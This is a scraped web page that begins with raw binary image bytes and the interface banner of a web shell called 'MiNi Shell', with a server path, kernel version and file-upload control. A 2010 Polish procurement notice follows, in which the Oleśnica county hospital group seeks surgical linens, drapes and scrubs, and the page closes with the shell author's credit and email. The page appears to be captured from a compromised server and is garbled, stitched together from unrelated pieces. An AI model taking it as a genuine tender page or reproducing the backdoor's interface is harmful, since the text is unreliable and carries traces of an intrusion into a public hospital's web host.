JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100408/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100408/98220-N-2010.html

<p class="kh_header"><b>Oleśnica: Przedmiotem zamówienia jest dostawa bielizny operacyjnej dla Powiatowego Zespołu Szpitali w Oleśnicy</b><br>
<b>Numer ogłoszenia: 98220 - 2010; data zamieszczenia: 08.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zespół Szpitali w Oleśnicy , ul. Armii Krajowej 1, 56-400 Oleśnica, woj. dolnośląskie, tel. 071 3143747, faks 071 3143747.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzsolesnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest dostawa bielizny operacyjnej dla Powiatowego Zespołu Szpitali w Oleśnicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa bielizny operacyjnej dla Powiatowego Zespołu Szpitali w Oleśnicy
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ramach warunku dotyczącego posiadania wiedzy i doświadczenia, Wykonawca ubiegający się o przedmiotowe zamówienie musi posiadać min. 2 należycie wykonane dostawy bielizny operacyjnej każda o wartości brutto:
- min. 116 tys. zł. w przypadku złożenia oferty na asortyment określony w Pakiecie nr 1
- min. 70 tys. zł. w przypadku złożenia oferty na asortyment określony w Pakiecie nr 2
W przypadku złożenia oferty na obie części przez tego samego Wykonawcę wartość każdej wykonanej i wykazanej dostawy bielizny operacyjnej musi być równa lub większa od łącznej wartości podanej wyżej dla poszczególnych pakietów, tj. musi być równa lub większa od wartości 186 tys. zł. brutto.
Spełnienie warunków udziału w postępowaniu oceniane będzie wg kryterium spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w SIWZ. Z treści załączonych dokumentów musi jednoznacznie wynikać, że Wykonawca w/w warunki spełnił. Niespełnienie któregoś z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania, z zastrzeżeniem postanowień art. 26 ust. 3 i 4 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- Deklaracje zgodności CE (dotyczy wszystkich klas wyrobu medycznego) 
- zgłoszenia lub wpisy do Rejestru Wyrobów Medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używania (nie dotyczy klasy wyrobu medycznego I i IIa pod warunkiem, że pierwsze jego wprowadzenie nastąpiło w innym niż Polska kraju Unii Europejskiej, zgodnie z przepisami ustawy z dnia 20.04.2004 r. o Wyrobach Medycznych - w takim przypadku należy złożyć stosowne wyjaśnienie</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- wypełniony formularz ofertowy (załącznik nr 1 do SIWZ),
- wypełniony formularz asortymentowo-cenowy (załącznik nr 2 do SIWZ)
- w przypadku reprezentowania Wykonawcy przez pełnomocnika, do oferty musi być załączony oryginał pełnomocnictwa lub jego kopia poświadczona notarialnie
- jeżeli odrębne przepisy nie wymagają wpisu do rejestru, do oferty należy dołączyć dokument, z którego będzie wynikało, że osoba, która podpisała ofertę jest upoważniona do reprezentowania firmy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzsolesnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zespół Szpitali
ul. Armii Krajowej 1
56-400 Oleśnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.04.2010 godzina 08:30, miejsce: Powiatowy Zespół Szpitali
ul. Armii Krajowej 1
56-400 Oleśnica
piętro IV, pokój 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Bielizna operacyjna jałowa i niejałowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Fartuch operacyjny chirurgiczny, jałowy, jednorazowy, bawełnopodobny, 2-warstwowa włóknina poliestrowo-wiskozowa o gramaturze min. 60g/m2 i dł. 134+/-2cm.Spełniający wymogi normy EN 13795(1-2). Minimalna odporność na penetrację płynu 24cm H2O. Przeznaczony do ochrony chirurga i pacjenta przed drobnoustrojami, z długim rękawem zakończonym poliestrowym, elastycznym mankietem o długości 8cm, kolor niebieski. Na opakowaniu muszą znajdować się 2 samoprzylepne naklejki(metki) z informacjami: indeks wyrobu, LOT, data ważności, identyfikacja wytwórcy - rozmiar: XL, ilość: 4000 szt. 
2. serweta operacyjna jałowa, foliowana, jednorazowa, wykonana z 2-warstwowej włókniny polietylenowo-polipropylenowa o gramaturze min. 43g, zabezpieczająca przed przesiąkaniem, antyelektrostatyczna. Spełniająca wymogi normy EN 13795 1-3. Kolor zielony. Na opakowaniu muszą znajdować się 2 samoprzylepne naklejki (metki) z informacjami: indeks wyrobu, LOT, data ważności, identyfikacja wytwórcy
- 130x90cm - ilość: 100 szt.
- 75x45cm - ilość: 4000 szt.
- 70x52cm - ilość: 625 szt.
3. serweta operacyjna jałowa, foliowana, jednorazowa, wykonana z 2-warstwowej włókniny polietylenowo-polipropylenowa o gramaturze min. 40g, zabezpieczająca przed przesiąkaniem, z przylepcem, antyelektrostatyczna. Spełniająca wymogi normy EN 13795 1-3. Kolor zielony. Na opakowaniu muszą znajdować się 2 samoprzylepne naklejki(metki) z informacjami: indeks wyrobu, LOT, data ważności, identyfikacja wytwórcy. Rozmiar: 40x40cm i otwór 5x5cm z przylepcem - ilość: 2700 szt.
4. Pokrowiec na nogi pacjenta wykonany z włókniny polipropylenowej o gramaturze min. 35g.Zielony, jałowy. Pakowany po 2 sztuki. Rozmiar: 80x120cm - ilość: 50 szt. 
5. Obłożenia pola operacyjnego jałowe, wykonane z włókniny laminowanej trójwarstwowej(włóknina polipropylenowa, folia polipropylenowa, włóknina wiskozowa) o gramaturze min 70g/m2 o drapowanej powierzchni. Spełniające wymogi normy EN 13795(1-3). Poszczególne serwety obłożenia powinny posiadać oznaczenie kierunku rozkładania(system strzałek) oraz miejscem przeznaczenia na polu operacyjnym(system głowa, stopa, dłoń). Zestaw ma być pakowany w torbę foliowo-papierową oraz dodatkowo wewnątrz musi być zawinięte w papier krepowy. Na opakowaniu muszą się znajdować 2 samoprzylepne naklejki(metki) z informacjami: indeks wyrobu, data ważności, identyfikacja wytwórcy, LOT	uniwersalne do operacji brzusznych:podkład 240x180cm z przylepcem 1 szt., podkład 150x180cm z przylepcem 1 szt., serweta 90x80cm z przylepcem 2 szt., ręczniki włókninowe 50x40 4 szt. - ilość: 1000 szt.
6. Serweta na stolik MAYO jałowa, wykonana z włókniny laminowanej dwuwarstwowej (folia poliutelanowa, włóknina wiskozowa)o gramaturze 59g/m2 i drapowanej powierzchni. Spełniające wymogi normy EN 13795(1-3).Na opakowaniu muszą znajdować się 2 samoprzylepne naklejki(metki)z informacjami: indeks wyrobu, LOT, data ważności, identyfikacja wytwórcy. Rozmiar: 145x75cm - ilość: 1000 szt.
7. Taśma medyczna mocująca z przylepcem, jałowa, wykonana z włókniny foliowanej polipropylenowo-polietylenowej o gramaturze min. 40g. Rozmiar: 90x10cm - ilość: 15 szt.
8. Prześcieradło z włókniny polietylenowo-polipropylenowej nieprzemakalnej, jednorazowe, zielone antystatyczne, niejałowe. Rozmiar: 134x210cm - ilość: 1525 szt.
9. Podkład z włókniny polietylenowo-polipropylenowej, nieprzemakalnej, jednorazowy, zielony, antystatyczny, niejałowy. Rozmiar: 90x134cm	 - ilość: 1350 szt. 
10. Komplet pościeli jednorazowej, duża wytrzymałość na zrywanie, wykonany z włókniny polipropylenowej, powłoczka 90x75cm; poszwa 200x150cm; prześcieradło 210x150cm - ilość: 360 szt.
11. Podkład na rolce higieniczny jednorazowy, dwuwarstwowy wykonany z bibuły celulozowej z perforacja, niejałowy, niepodfoliowany, szerokość 510mm, długość rolki 40m, długość listka 500mm - ilość: 300 szt.
12. Foliowa osłona przewodów urządzeń medycznych. Rozmiar: 300cm x 16cm - ilość: 300 szt.
13. Pokrowiec sterylny na wiertarkę chirurgiczną. Rozmiar: 300cm x 20 lub 25 cm - ilość: 300 szt.
14. Zestaw do operacji pęcherzyka żółciowego, jałowy z nitką radiacyjną, sterylizowany parą wodną w nadciśnieniu. Wymagana samoprzylepna etykietka z pełną identyfikacją z możliwością wklejenia do dokumentacji szpitalnej, oznakowany kierunek otwierania. Zgodny z normą EN-PN 868-5. 4x20 szt. Kompres 7,5x7,5 17-nitkowy 16-warstwowy z nitką radiacyjną, 10 szt. Tupfer kula 20x20cm 17-nitkowy z nitką radiacyjną, 4 szt. Serweta 45x45cm 4-warstwowa z nitką radiacyjną i tasiemką - ilość: 150 szt.
15. Pakiet zabiegowy do wyrostka robaczkowego jałowy z nitką radiacyjną sterylizowany parą wodną w nadciśnieniu. Wymagana samoprzylepna etykieta z pełną identyfikacją z możliwością wklejania do dokumentacji szpitalnej. Oznakowany kierunek otwierania. Zgodny z normą EN-PN 868-5. 3x20 szt. Kompres 7,5x7,5 8-warstwowy z nitką z kontrastem RTG, 2 szt. Serweta operacyjna 45x45cm z nitką z kontrastem RTG i tasiemką, 15 szt tupfery fasolki 15x15cm z nitką z kontrastem RTG - ilość: 120 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - Zestawy do cięcia cesarskiego i ubrania chirurgiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zestaw do cięcia cesarskiego.
Zestaw wykonany z chłonnego wytrzymałego, nieprzemakalnego laminatu o gramaturze min. 60g/m2, min. Nieprzemakalności 100cm H2O i wytrzymałość na rozrywanie min. 100Kpa.. Serweta główna w części centralnej ma otwór wypełniony folią chirurgiczną o grubości min. 0,025mm. Otwór ten okala worek z usztywnionym brzegiem przechwytującym płyn. Worek ten posiada zawór do podłączenia drenu. Serweta mniejsza stosowana do owinięcia noworodka wykonana z materiału bawełnopodobnego (celulozowo- poliestrowej-typu sontara) o gramaturze min. 70g/m2. Serweta na stolik Mayo wykonana z folii PE o min. Grubości 0,05mm, warstwa chłonna z laminatu dwuwarstwowego, nieprzemakalnego o gramaturze min. 60g/m2. Serweta większa stosowana do owinięcia zestawu, która również może służyć jako pokrycie stolika, wykonane z mocnego chłonnego laminatu nieprzemakalnego o gramaturze min. 100Kpa. Serweta 180x300cm z otworem 20x30x20cm. Serweta 80x90cm. Pokrowiec na stolik Mayo 80x140cm. Taśma samoprzylepna 10x50cm. Cztery ściereczki chłonne 30x40 cm. Serweta 150x200 cm - ilość: 400 szt.
2. Ubranie chirurgiczne - bluza + spodnie - wykonane z włókniny  bawełnopodobnej typu spunbonded o gramaturze minimalnej 50 g/m2 ,  antystatycznej niepalącej, oddychającej, przeznaczonej  do stosowania przez personel medyczny w środowisku bloku operacyjnego. 
- Bluza - krótki rękaw, pod szyją wyposażona w nap, kieszeń na piersi, dwie kieszenie boczne na dole bluzy
- Spodnie - ściągane tasiemką, kieszeń boczna na nogawicy z klapką wyposażoną w nap
- Sposób pakowania umożliwiający indywidualny dobór rozmiaru - oddzielnie pakowane bluzy i spodnie.
Kolor niebieski. W rozmiarach S, M, L, XL	- ilość: 3300 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com